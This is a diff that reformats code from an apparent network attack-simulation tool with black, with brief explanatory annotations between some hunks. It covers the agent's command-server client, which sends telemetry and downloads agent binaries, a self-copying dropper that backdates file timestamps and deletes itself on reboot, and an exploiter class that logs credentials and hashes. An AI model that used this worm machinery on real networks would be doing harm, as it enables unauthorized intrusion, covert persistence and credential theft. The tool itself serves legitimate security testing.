+    LONG_REQUEST_TIMEOUT,
+    MEDIUM_REQUEST_TIMEOUT,
+    SHORT_REQUEST_TIMEOUT,
+)
 from common.common_consts.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH
 from infection_monkey.config import GUID, WormConfiguration
 from infection_monkey.network.info import check_internet_access, local_ips
@@ -19,7 +21,7 @@ from infection_monkey.transport.http import HTTPConnectProxy
 from infection_monkey.transport.tcp import TcpProxy
 from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException

-__author__ = 'hoffer'
+__author__ = "hoffer"


 requests.packages.urllib3.disable_warnings()
@@ -49,27 +51,34 @@ class ControlClient(object):
         if has_internet_access is None:
             has_internet_access = check_internet_access(WormConfiguration.internet_services)

-        monkey = {'guid': GUID,
-                  'hostname': hostname,
-                  'ip_addresses': local_ips(),
-                  'description': " ".join(platform.uname()),
-                  'internet_access': has_internet_access,
-                  'config': WormConfiguration.as_dict(),
-                  'parent': parent}
+        monkey = {
+            "guid": GUID,
+            "hostname": hostname,
+            "ip_addresses": local_ips(),
+            "description": " ".join(platform.uname()),
+            "internet_access": has_internet_access,
+            "config": WormConfiguration.as_dict(),
+            "parent": parent,
+        }

         if ControlClient.proxies:
-            monkey['tunnel'] = ControlClient.proxies.get('https')
+            monkey["tunnel"] = ControlClient.proxies.get("https")

-        requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,),  # noqa: DUO123
-                      data=json.dumps(monkey),
-                      headers={'content-type': 'application/json'},
-                      verify=False,
-                      proxies=ControlClient.proxies,
-                      timeout=20)
+        requests.post(
+            "https://%s/api/monkey" % (WormConfiguration.current_server,),  # noqa: DUO123
+            data=json.dumps(monkey),
+            headers={"content-type": "application/json"},
+            verify=False,
+            proxies=ControlClient.proxies,
+            timeout=20,
+        )

     @staticmethod
     def find_server(default_tunnel=None):
-        LOG.debug("Trying to wake up with Monkey Island servers list: %r" % WormConfiguration.command_servers)
+        LOG.debug(
+            "Trying to wake up with Monkey Island servers list: %r"
+            % WormConfiguration.command_servers
+        )
         if default_tunnel:
             LOG.debug("default_tunnel: %s" % (default_tunnel,))

@@ -83,10 +92,12 @@ class ControlClient(object):
             if ControlClient.proxies:
                 debug_message += " through proxies: %s" % ControlClient.proxies
             LOG.debug(debug_message)
-            requests.get(f"https://{server}/api?action=is-up",  # noqa: DUO123
-                         verify=False,
-                         proxies=ControlClient.proxies,
-                         timeout=TIMEOUT_IN_SECONDS)
+            requests.get(
+                f"https://{server}/api?action=is-up",  # noqa: DUO123
+                verify=False,
+                proxies=ControlClient.proxies,
+                timeout=TIMEOUT_IN_SECONDS,
+            )
             WormConfiguration.current_server = current_server
             break

@@ -105,7 +116,7 @@ class ControlClient(object):
         if proxy_find:
             proxy_address, proxy_port = proxy_find
             LOG.info("Found tunnel at %s:%s" % (proxy_address, proxy_port))
-            ControlClient.proxies['https'] = 'https://%s:%s' % (proxy_address, proxy_port)
+            ControlClient.proxies["https"] = "https://%s:%s" % (proxy_address, proxy_port)
             return ControlClient.find_server()
         else:
             LOG.info("No tunnel found")
@@ -118,74 +129,97 @@ class ControlClient(object):
         try:
             monkey = {}
             if ControlClient.proxies:
-                monkey['tunnel'] = ControlClient.proxies.get('https')
-            requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),  # noqa: DUO123
-                           data=json.dumps(monkey),
-                           headers={'content-type': 'application/json'},
-                           verify=False,
-                           proxies=ControlClient.proxies,
-                           timeout=MEDIUM_REQUEST_TIMEOUT)
+                monkey["tunnel"] = ControlClient.proxies.get("https")
+            requests.patch(
+                "https://%s/api/monkey/%s"
+                % (WormConfiguration.current_server, GUID),  # noqa: DUO123
+                data=json.dumps(monkey),
+                headers={"content-type": "application/json"},
+                verify=False,
+                proxies=ControlClient.proxies,
+                timeout=MEDIUM_REQUEST_TIMEOUT,
+            )
         except Exception as exc:
-            LOG.warning("Error connecting to control server %s: %s",
-                        WormConfiguration.current_server, exc)
+            LOG.warning(
+                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+            )
             return {}

     @staticmethod
     def send_telemetry(telem_category, json_data: str):
         if not WormConfiguration.current_server:
-            LOG.error("Trying to send %s telemetry before current server is established, aborting." % telem_category)
+            LOG.error(
+                "Trying to send %s telemetry before current server is established, aborting."
+                % telem_category
+            )
             return
         try:
-            telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': json_data}
-            requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,),  # noqa: DUO123
-                          data=json.dumps(telemetry),
-                          headers={'content-type': 'application/json'},
-                          verify=False,
-                          proxies=ControlClient.proxies,
-                          timeout=MEDIUM_REQUEST_TIMEOUT)
+            telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
+            requests.post(
+                "https://%s/api/telemetry" % (WormConfiguration.current_server,),  # noqa: DUO123
+                data=json.dumps(telemetry),
+                headers={"content-type": "application/json"},
+                verify=False,
+                proxies=ControlClient.proxies,
+                timeout=MEDIUM_REQUEST_TIMEOUT,
+            )
         except Exception as exc:
-            LOG.warning("Error connecting to control server %s: %s",
-                        WormConfiguration.current_server, exc)
+            LOG.warning(
+                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+            )

     @staticmethod
     def send_log(log):
         if not WormConfiguration.current_server:
             return
         try:
-            telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)}
-            requests.post("https://%s/api/log" % (WormConfiguration.current_server,),  # noqa: DUO123
-                          data=json.dumps(telemetry),
-                          headers={'content-type': 'application/json'},
-                          verify=False,
-                          proxies=ControlClient.proxies,
-                          timeout=MEDIUM_REQUEST_TIMEOUT)
+            telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
+            requests.post(
+                "https://%s/api/log" % (WormConfiguration.current_server,),  # noqa: DUO123
+                data=json.dumps(telemetry),
+                headers={"content-type": "application/json"},
+                verify=False,
+                proxies=ControlClient.proxies,
+                timeout=MEDIUM_REQUEST_TIMEOUT,
+            )
         except Exception as exc:
-            LOG.warning("Error connecting to control server %s: %s",
-                        WormConfiguration.current_server, exc)
+            LOG.warning(
+                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+            )

     @staticmethod
     def load_control_config():
         if not WormConfiguration.current_server:
             return
         try:
-            reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),  # noqa: DUO123
-                                 verify=False,
-                                 proxies=ControlClient.proxies,
-                                 timeout=MEDIUM_REQUEST_TIMEOUT)
+            reply = requests.get(
+                "https://%s/api/monkey/%s"
+                % (WormConfiguration.current_server, GUID),  # noqa: DUO123
+                verify=False,
+                proxies=ControlClient.proxies,
+                timeout=MEDIUM_REQUEST_TIMEOUT,
+            )

         except Exception as exc:
-            LOG.warning("Error connecting to control server %s: %s",
-                        WormConfiguration.current_server, exc)
+            LOG.warning(
+                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+            )
             return

         try:
-            unknown_variables = WormConfiguration.from_kv(reply.json().get('config'))
-            LOG.info("New configuration was loaded from server: %r" %
-                     (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),))
+            unknown_variables = WormConfiguration.from_kv(reply.json().get("config"))
+            LOG.info(
+                "New configuration was loaded from server: %r"
+                % (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)
+            )
         except Exception as exc:
             # we don't continue with default conf here because it might be dangerous
-            LOG.error("Error parsing JSON reply from control server %s (%s): %s",
-                      WormConfiguration.current_server, reply._content, exc)
+            LOG.error(
+                "Error parsing JSON reply from control server %s (%s): %s",
+                WormConfiguration.current_server,
+                reply._content,
+                exc,
+            )
             raise Exception("Couldn't load from from server's configuration, aborting. %s" % exc)

         if unknown_variables:
@@ -196,14 +230,19 @@ class ControlClient(object):
         if not WormConfiguration.current_server:
             return
         try:
-            requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),  # noqa: DUO123
-                           data=json.dumps({'config_error': True}),
-                           headers={'content-type': 'application/json'},
-                           verify=False,
-                           proxies=ControlClient.proxies,
-                           timeout=MEDIUM_REQUEST_TIMEOUT)
+            requests.patch(
+                "https://%s/api/monkey/%s"
+                % (WormConfiguration.current_server, GUID),  # noqa: DUO123
+                data=json.dumps({"config_error": True}),
+                headers={"content-type": "application/json"},
+                verify=False,
+                proxies=ControlClient.proxies,
+                timeout=MEDIUM_REQUEST_TIMEOUT,
+            )
         except Exception as exc:
-            LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
+            LOG.warning(
+                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+            )
             return {}

     @staticmethod
@@ -221,7 +260,8 @@ class ControlClient(object):
     @staticmethod
     def download_monkey_exe_by_os(is_windows, is_32bit):
         filename, size = ControlClient.get_monkey_exe_filename_and_size_by_host_dict(
-            ControlClient.spoof_host_os_info(is_windows, is_32bit))
+            ControlClient.spoof_host_os_info(is_windows, is_32bit)
+        )
         if filename is None:
             return None
         return ControlClient.download_monkey_exe_by_filename(filename, size)
@@ -241,14 +281,7 @@ class ControlClient(object):
         else:
             arch = "x86_64"

-        return \
-            {
-                "os":
-                    {
-                        "type": os,
-                        "machine": arch
-                    }
-            }
+        return {"os": {"type": os, "machine": arch}}

     @staticmethod
     def download_monkey_exe_by_filename(filename, size):
@@ -259,13 +292,15 @@ class ControlClient(object):
             if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)):
                 return dest_file
             else:
-                download = requests.get("https://%s/api/monkey/download/%s" %  # noqa: DUO123
-                                        (WormConfiguration.current_server, filename),
-                                        verify=False,
-                                        proxies=ControlClient.proxies,
-                                        timeout=MEDIUM_REQUEST_TIMEOUT)
+                download = requests.get(
+                    "https://%s/api/monkey/download/%s"
+                    % (WormConfiguration.current_server, filename),  # noqa: DUO123
+                    verify=False,
+                    proxies=ControlClient.proxies,
+                    timeout=MEDIUM_REQUEST_TIMEOUT,
+                )

-                with monkeyfs.open(dest_file, 'wb') as file_obj:
+                with monkeyfs.open(dest_file, "wb") as file_obj:
                     for chunk in download.iter_content(chunk_size=DOWNLOAD_CHUNK):
                         if chunk:
                             file_obj.write(chunk)
@@ -274,8 +309,9 @@ class ControlClient(object):
             return dest_file

         except Exception as exc:
-            LOG.warning("Error connecting to control server %s: %s",
-                        WormConfiguration.current_server, exc)
+            LOG.warning(
+                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+            )

     @staticmethod
     def get_monkey_exe_filename_and_size_by_host(host):
@@ -286,24 +322,29 @@ class ControlClient(object):
         if not WormConfiguration.current_server:
             return None, None
         try:
-            reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,),  # noqa: DUO123
-                                  data=json.dumps(host_dict),
-                                  headers={'content-type': 'application/json'},
-                                  verify=False, proxies=ControlClient.proxies,
-                                  timeout=LONG_REQUEST_TIMEOUT)
+            reply = requests.post(
+                "https://%s/api/monkey/download"
+                % (WormConfiguration.current_server,),  # noqa: DUO123
+                data=json.dumps(host_dict),
+                headers={"content-type": "application/json"},
+                verify=False,
+                proxies=ControlClient.proxies,
+                timeout=LONG_REQUEST_TIMEOUT,
+            )
             if 200 == reply.status_code:
                 result_json = reply.json()
-                filename = result_json.get('filename')
+                filename = result_json.get("filename")
                 if not filename:
                     return None, None
-                size = result_json.get('size')
+                size = result_json.get("size")
                 return filename, size
             else:
                 return None, None

         except Exception as exc:
-            LOG.warning("Error connecting to control server %s: %s",
-                        WormConfiguration.current_server, exc)
+            LOG.warning(
+                "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+            )

             return None, None

@@ -312,11 +353,11 @@ class ControlClient(object):
         if not WormConfiguration.current_server:
             return None

-        my_proxy = ControlClient.proxies.get('https', '').replace('https://', '')
+        my_proxy = ControlClient.proxies.get("https", "").replace("https://", "")
         if my_proxy:
             proxy_class = TcpProxy
             try:
-                target_addr, target_port = my_proxy.split(':', 1)
+                target_addr, target_port = my_proxy.split(":", 1)
                 target_port = int(target_port)
             except ValueError:
                 return None
@@ -329,34 +370,43 @@ class ControlClient(object):
     @staticmethod
     def get_pba_file(filename):
         try:
-            return requests.get(PBA_FILE_DOWNLOAD %  # noqa: DUO123
-                                (WormConfiguration.current_server, filename),
-                                verify=False,
-                                proxies=ControlClient.proxies,
-                                timeout=LONG_REQUEST_TIMEOUT)
+            return requests.get(
+                PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename),  # noqa: DUO123
+                verify=False,
+                proxies=ControlClient.proxies,
+                timeout=LONG_REQUEST_TIMEOUT,
+            )
         except requests.exceptions.RequestException:
             return False

     @staticmethod
     def get_T1216_pba_file():
         try:
-            return requests.get(urljoin(f"https://{WormConfiguration.current_server}/",  # noqa: DUO123
-                                        T1216_PBA_FILE_DOWNLOAD_PATH),
-                                verify=False,
-                                proxies=ControlClient.proxies,
-                                stream=True,
-                                timeout=MEDIUM_REQUEST_TIMEOUT)
+            return requests.get(
+                urljoin(
+                    f"https://{WormConfiguration.current_server}/",  # noqa: DUO123
+                    T1216_PBA_FILE_DOWNLOAD_PATH,
+                ),
+                verify=False,
+                proxies=ControlClient.proxies,
+                stream=True,
+                timeout=MEDIUM_REQUEST_TIMEOUT,
+            )
         except requests.exceptions.RequestException:
             return False

     @staticmethod
     def should_monkey_run(vulnerable_port: str) -> bool:
-        if vulnerable_port and \
-                WormConfiguration.get_hop_distance_to_island() > 1 and \
-                ControlClient.can_island_see_port(vulnerable_port) and \
-                WormConfiguration.started_on_island:
-            raise PlannedShutdownException("Monkey shouldn't run on current machine "
-                                           "(it will be exploited later with more depth).")
+        if (
+            vulnerable_port
+            and WormConfiguration.get_hop_distance_to_island() > 1
+            and ControlClient.can_island_see_port(vulnerable_port)
+            and WormConfiguration.started_on_island
+        ):
+            raise PlannedShutdownException(
+                "Monkey shouldn't run on current machine "
+                "(it will be exploited later with more depth)."
+            )
         return True

     @staticmethod
@@ -365,13 +415,15 @@ class ControlClient(object):
             url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
             response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
             response = json.loads(response.content.decode())
-            return response['status'] == "port_visible"
+            return response["status"] == "port_visible"
         except requests.exceptions.RequestException:
             return False

     @staticmethod
     def report_start_on_island():
-        requests.post(f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
-                      data=json.dumps({'started_on_island': True}),
-                      verify=False,
-                      timeout=MEDIUM_REQUEST_TIMEOUT)
+        requests.post(
+            f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
+            data=json.dumps({"started_on_island": True}),
+            verify=False,
+            timeout=MEDIUM_REQUEST_TIMEOUT,
+        )
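Every network call black reflowed in ControlClient follows one shape: a requests call with an explicit timeout, verify=False (presumably because the island serves a self-signed certificate), optional proxies, and a broad except that only logs. A condensed sketch of that recurring pattern (an illustrative helper, not part of the repo):

import json
import logging

import requests

LOG = logging.getLogger(__name__)

def post_json(url: str, payload: dict, proxies=None, timeout=15):
    # Mirrors the ControlClient calls above: JSON body, no cert verification,
    # failures logged and swallowed so the agent keeps running.
    try:
        return requests.post(
            url,
            data=json.dumps(payload),
            headers={"content-type": "application/json"},
            verify=False,
            proxies=proxies,
            timeout=timeout,
        )
    except Exception as exc:
        LOG.warning("Error connecting to control server %s: %s", url, exc)
        return None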
@@ -13,7 +13,11 @@ from ctypes import c_char_p
 from common.utils.attack_utils import ScanStatus, UsageEnum
 from infection_monkey.config import WormConfiguration
 from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
-from infection_monkey.model import GENERAL_CMDLINE_LINUX, MONKEY_CMDLINE_LINUX, MONKEY_CMDLINE_WINDOWS
+from infection_monkey.model import (
+    GENERAL_CMDLINE_LINUX,
+    MONKEY_CMDLINE_LINUX,
+    MONKEY_CMDLINE_WINDOWS,
+)
 from infection_monkey.system_info import OperatingSystem, SystemInfoCollector
 from infection_monkey.telemetry.attack.t1106_telem import T1106Telem

@@ -29,7 +33,7 @@ except NameError:
     # noinspection PyShadowingBuiltins
     WindowsError = IOError

-__author__ = 'itamar'
+__author__ = "itamar"

 LOG = logging.getLogger(__name__)

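The hunk below reflows MonkeyDrops. One detail worth noticing while reading it: the dropper parses its CLI with parse_known_args, so unrecognized flags are kept rather than rejected, and the raw argument tail (args[1:]) is preserved for the monkey process it spawns. A standalone illustration of that argparse behavior:

import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-l", "--location")

# Unknown flags come back in `extra` instead of raising SystemExit.
opts, extra = parser.parse_known_args(["-l", "/tmp/monkey", "--new-flag", "x"])
assert opts.location == "/tmp/monkey"
assert extra == ["--new-flag", "x"]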
@@ -39,108 +43,141 @@ MOVEFILE_DELAY_UNTIL_REBOOT = 4
 class MonkeyDrops(object):
     def __init__(self, args):
         arg_parser = argparse.ArgumentParser()
-        arg_parser.add_argument('-p', '--parent')
-        arg_parser.add_argument('-t', '--tunnel')
-        arg_parser.add_argument('-s', '--server')
-        arg_parser.add_argument('-d', '--depth', type=int)
-        arg_parser.add_argument('-l', '--location')
-        arg_parser.add_argument('-vp', '--vulnerable-port')
+        arg_parser.add_argument("-p", "--parent")
+        arg_parser.add_argument("-t", "--tunnel")
+        arg_parser.add_argument("-s", "--server")
+        arg_parser.add_argument("-d", "--depth", type=int)
+        arg_parser.add_argument("-l", "--location")
+        arg_parser.add_argument("-vp", "--vulnerable-port")
         self.monkey_args = args[1:]
         self.opts, _ = arg_parser.parse_known_args(args)

-        self._config = {'source_path': os.path.abspath(sys.argv[0]),
-                        'destination_path': self.opts.location}
+        self._config = {
+            "source_path": os.path.abspath(sys.argv[0]),
+            "destination_path": self.opts.location,
+        }

     def initialize(self):
         LOG.debug("Dropper is running with config:\n%s", pprint.pformat(self._config))

     def start(self):
-        if self._config['destination_path'] is None:
+        if self._config["destination_path"] is None:
             LOG.error("No destination path specified")
             return False

         # we copy/move only in case path is different
         try:
-            file_moved = filecmp.cmp(self._config['source_path'], self._config['destination_path'])
+            file_moved = filecmp.cmp(self._config["source_path"], self._config["destination_path"])
         except OSError:
             file_moved = False

-        if not file_moved and os.path.exists(self._config['destination_path']):
-            os.remove(self._config['destination_path'])
+        if not file_moved and os.path.exists(self._config["destination_path"]):
+            os.remove(self._config["destination_path"])

         # first try to move the file
         if not file_moved and WormConfiguration.dropper_try_move_first:
             try:
-                shutil.move(self._config['source_path'],
-                            self._config['destination_path'])
+                shutil.move(self._config["source_path"], self._config["destination_path"])

-                LOG.info("Moved source file '%s' into '%s'",
-                         self._config['source_path'], self._config['destination_path'])
+                LOG.info(
+                    "Moved source file '%s' into '%s'",
+                    self._config["source_path"],
+                    self._config["destination_path"],
+                )

                 file_moved = True
             except (WindowsError, IOError, OSError) as exc:
-                LOG.debug("Error moving source file '%s' into '%s': %s",
-                          self._config['source_path'], self._config['destination_path'],
-                          exc)
+                LOG.debug(
+                    "Error moving source file '%s' into '%s': %s",
+                    self._config["source_path"],
+                    self._config["destination_path"],
+                    exc,
+                )

         # if file still need to change path, copy it
         if not file_moved:
             try:
-                shutil.copy(self._config['source_path'],
-                            self._config['destination_path'])
+                shutil.copy(self._config["source_path"], self._config["destination_path"])

-                LOG.info("Copied source file '%s' into '%s'",
-                         self._config['source_path'], self._config['destination_path'])
+                LOG.info(
+                    "Copied source file '%s' into '%s'",
+                    self._config["source_path"],
+                    self._config["destination_path"],
+                )
             except (WindowsError, IOError, OSError) as exc:
-                LOG.error("Error copying source file '%s' into '%s': %s",
-                          self._config['source_path'], self._config['destination_path'],
-                          exc)
+                LOG.error(
+                    "Error copying source file '%s' into '%s': %s",
+                    self._config["source_path"],
+                    self._config["destination_path"],
+                    exc,
+                )

                 return False

         if WormConfiguration.dropper_set_date:
-            if sys.platform == 'win32':
-                dropper_date_reference_path = os.path.expandvars(WormConfiguration.dropper_date_reference_path_windows)
+            if sys.platform == "win32":
+                dropper_date_reference_path = os.path.expandvars(
+                    WormConfiguration.dropper_date_reference_path_windows
+                )
             else:
                 dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
             try:
                 ref_stat = os.stat(dropper_date_reference_path)
             except OSError:
-                LOG.warning("Cannot set reference date using '%s', file not found",
-                            dropper_date_reference_path)
+                LOG.warning(
+                    "Cannot set reference date using '%s', file not found",
+                    dropper_date_reference_path,
+                )
             else:
                 try:
-                    os.utime(self._config['destination_path'],
-                             (ref_stat.st_atime, ref_stat.st_mtime))
+                    os.utime(
+                        self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime)
+                    )
                 except OSError:
                     LOG.warning("Cannot set reference date to destination file")

-        monkey_options = \
-            build_monkey_commandline_explicitly(parent=self.opts.parent,
-                                                tunnel=self.opts.tunnel,
-                                                server=self.opts.server,
-                                                depth=self.opts.depth,
-                                                location=None,
-                                                vulnerable_port=self.opts.vulnerable_port)
+        monkey_options = build_monkey_commandline_explicitly(
+            parent=self.opts.parent,
+            tunnel=self.opts.tunnel,
+            server=self.opts.server,
+            depth=self.opts.depth,
+            location=None,
+            vulnerable_port=self.opts.vulnerable_port,
+        )

         if OperatingSystem.Windows == SystemInfoCollector.get_os():
-            monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options
+            monkey_cmdline = (
+                MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
+                + monkey_options
+            )
         else:
-            dest_path = self._config['destination_path']
|
dest_path = self._config["destination_path"]
|
||||||
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
|
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
|
||||||
# runs the monkey
|
# runs the monkey
|
||||||
inner_monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_filename': dest_path.split("/")[-1]} + monkey_options
|
inner_monkey_cmdline = (
|
||||||
monkey_cmdline = GENERAL_CMDLINE_LINUX % {'monkey_directory': dest_path[0:dest_path.rfind("/")],
|
MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
|
||||||
'monkey_commandline': inner_monkey_cmdline}
|
+ monkey_options
|
||||||
|
)
|
||||||
|
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
|
||||||
|
"monkey_directory": dest_path[0 : dest_path.rfind("/")],
|
||||||
|
"monkey_commandline": inner_monkey_cmdline,
|
||||||
|
}
|
||||||
|
|
||||||
monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
|
monkey_process = subprocess.Popen(
|
||||||
stdin=subprocess.PIPE,
|
monkey_cmdline,
|
||||||
stdout=subprocess.PIPE,
|
shell=True,
|
||||||
stderr=subprocess.PIPE,
|
stdin=subprocess.PIPE,
|
||||||
close_fds=True, creationflags=DETACHED_PROCESS)
|
stdout=subprocess.PIPE,
|
||||||
|
stderr=subprocess.PIPE,
|
||||||
|
close_fds=True,
|
||||||
|
creationflags=DETACHED_PROCESS,
|
||||||
|
)
|
||||||
|
|
||||||
LOG.info("Executed monkey process (PID=%d) with command line: %s",
|
LOG.info(
|
||||||
monkey_process.pid, monkey_cmdline)
|
"Executed monkey process (PID=%d) with command line: %s",
|
||||||
|
monkey_process.pid,
|
||||||
|
monkey_cmdline,
|
||||||
|
)
|
||||||
|
|
||||||
time.sleep(3)
|
time.sleep(3)
|
||||||
if monkey_process.poll() is not None:
|
if monkey_process.poll() is not None:
|
||||||
|
@ -150,25 +187,35 @@ class MonkeyDrops(object):
|
||||||
LOG.info("Cleaning up the dropper")
|
LOG.info("Cleaning up the dropper")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if (self._config['source_path'].lower() != self._config['destination_path'].lower()) and \
|
if (
|
||||||
os.path.exists(self._config['source_path']) and \
|
(self._config["source_path"].lower() != self._config["destination_path"].lower())
|
||||||
WormConfiguration.dropper_try_move_first:
|
and os.path.exists(self._config["source_path"])
|
||||||
|
and WormConfiguration.dropper_try_move_first
|
||||||
|
):
|
||||||
|
|
||||||
# try removing the file first
|
# try removing the file first
|
||||||
try:
|
try:
|
||||||
os.remove(self._config['source_path'])
|
os.remove(self._config["source_path"])
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error removing source file '%s': %s", self._config['source_path'], exc)
|
LOG.debug(
|
||||||
|
"Error removing source file '%s': %s", self._config["source_path"], exc
|
||||||
|
)
|
||||||
|
|
||||||
# mark the file for removal on next boot
|
# mark the file for removal on next boot
|
||||||
dropper_source_path_ctypes = c_char_p(self._config['source_path'])
|
dropper_source_path_ctypes = c_char_p(self._config["source_path"])
|
||||||
if 0 == ctypes.windll.kernel32.MoveFileExA(dropper_source_path_ctypes, None,
|
if 0 == ctypes.windll.kernel32.MoveFileExA(
|
||||||
MOVEFILE_DELAY_UNTIL_REBOOT):
|
dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
|
||||||
LOG.debug("Error marking source file '%s' for deletion on next boot (error %d)",
|
):
|
||||||
self._config['source_path'], ctypes.windll.kernel32.GetLastError())
|
LOG.debug(
|
||||||
|
"Error marking source file '%s' for deletion on next boot (error %d)",
|
||||||
|
self._config["source_path"],
|
||||||
|
ctypes.windll.kernel32.GetLastError(),
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
LOG.debug("Dropper source file '%s' is marked for deletion on next boot",
|
LOG.debug(
|
||||||
self._config['source_path'])
|
"Dropper source file '%s' is marked for deletion on next boot",
|
||||||
|
self._config["source_path"],
|
||||||
|
)
|
||||||
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
|
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
|
||||||
|
|
||||||
LOG.info("Dropper cleanup complete")
|
LOG.info("Dropper cleanup complete")
|
||||||
|
|
|
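Nearly all of the churn in the dropper hunk above is mechanical: black v20.8b1 enforces an 88-column line length, collapses a call onto one line when it fits, and otherwise explodes it to one argument per line with a trailing "magic" comma that keeps the call multi-line on later runs. A minimal sketch of the rule, using a hypothetical `configure` helper rather than code from this diff:

    def configure(host, port, timeout_seconds, retry_count, verify_certificates):
        return (host, port, timeout_seconds, retry_count, verify_certificates)

    # Fits within 88 columns: black keeps the call on one line
    configure("10.0.0.1", 443, 30, 3, False)

    # Over 88 columns: black explodes it, one argument per line, trailing comma
    configure(
        host="a-sufficiently-long-hostname.internal.example.com",
        port=443,
        timeout_seconds=30,
        retry_count=3,
        verify_certificates=False,
    )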
@@ -8,7 +8,7 @@ from common.utils.exploit_enum import ExploitType
 from infection_monkey.config import WormConfiguration
 from infection_monkey.utils.plugins.plugin import Plugin

-__author__ = 'itamar'
+__author__ = "itamar"


 logger = logging.getLogger(__name__)

@@ -48,31 +48,42 @@ class HostExploiter(Plugin):

     def __init__(self, host):
         self._config = WormConfiguration
-        self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
-                             'started': '',
-                             'finished': '',
-                             'vulnerable_urls': [],
-                             'vulnerable_ports': [],
-                             'executed_cmds': []}
+        self.exploit_info = {
+            "display_name": self._EXPLOITED_SERVICE,
+            "started": "",
+            "finished": "",
+            "vulnerable_urls": [],
+            "vulnerable_ports": [],
+            "executed_cmds": [],
+        }
         self.exploit_attempts = []
         self.host = host

     def set_start_time(self):
-        self.exploit_info['started'] = datetime.now().isoformat()
+        self.exploit_info["started"] = datetime.now().isoformat()

     def set_finish_time(self):
-        self.exploit_info['finished'] = datetime.now().isoformat()
+        self.exploit_info["finished"] = datetime.now().isoformat()

     def is_os_supported(self):
-        return self.host.os.get('type') in self._TARGET_OS_TYPE
+        return self.host.os.get("type") in self._TARGET_OS_TYPE

     def send_exploit_telemetry(self, result):
         from infection_monkey.telemetry.exploit_telem import ExploitTelem

         ExploitTelem(self, result).send()

-    def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
-        self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
-                                      'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
+    def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
+        self.exploit_attempts.append(
+            {
+                "result": result,
+                "user": user,
+                "password": password,
+                "lm_hash": lm_hash,
+                "ntlm_hash": ntlm_hash,
+                "ssh_key": ssh_key,
+            }
+        )

     def exploit_host(self):
         self.pre_exploit()

@@ -80,9 +91,9 @@ class HostExploiter(Plugin):
         try:
             result = self._exploit_host()
         except FailedExploitationError as e:
-            logger.debug(f'Exploiter failed: {e}.')
+            logger.debug(f"Exploiter failed: {e}.")
         except Exception:
-            logger.error('Exception in exploit_host', exc_info=True)
+            logger.error("Exception in exploit_host", exc_info=True)
         finally:
             self.post_exploit()
         return result

@@ -98,10 +109,10 @@ class HostExploiter(Plugin):
         raise NotImplementedError()

     def add_vuln_url(self, url):
-        self.exploit_info['vulnerable_urls'].append(url)
+        self.exploit_info["vulnerable_urls"].append(url)

     def add_vuln_port(self, port):
-        self.exploit_info['vulnerable_ports'].append(port)
+        self.exploit_info["vulnerable_ports"].append(port)

     def add_executed_cmd(self, cmd):
         """

@@ -109,5 +120,4 @@ class HostExploiter(Plugin):
         :param cmd: String of executed command. e.g. 'echo Example'
         """
         powershell = True if "powershell" in cmd.lower() else False
-        self.exploit_info['executed_cmds'].append(
-            {'cmd': cmd, 'powershell': powershell})
+        self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})
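One line in `add_executed_cmd` above is worth a side note: `powershell = True if "powershell" in cmd.lower() else False` survives the reformat untouched, because black only rearranges layout and never rewrites expressions. The membership test already yields a bool, so an equivalent simplification (a suggestion for a follow-up, not part of this commit) would be:

    cmd = "PowerShell -Command Get-Process"
    powershell = "powershell" in cmd.lower()  # same value, no conditional expression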
@@ -9,20 +9,19 @@ from urllib.parse import urljoin

 import requests

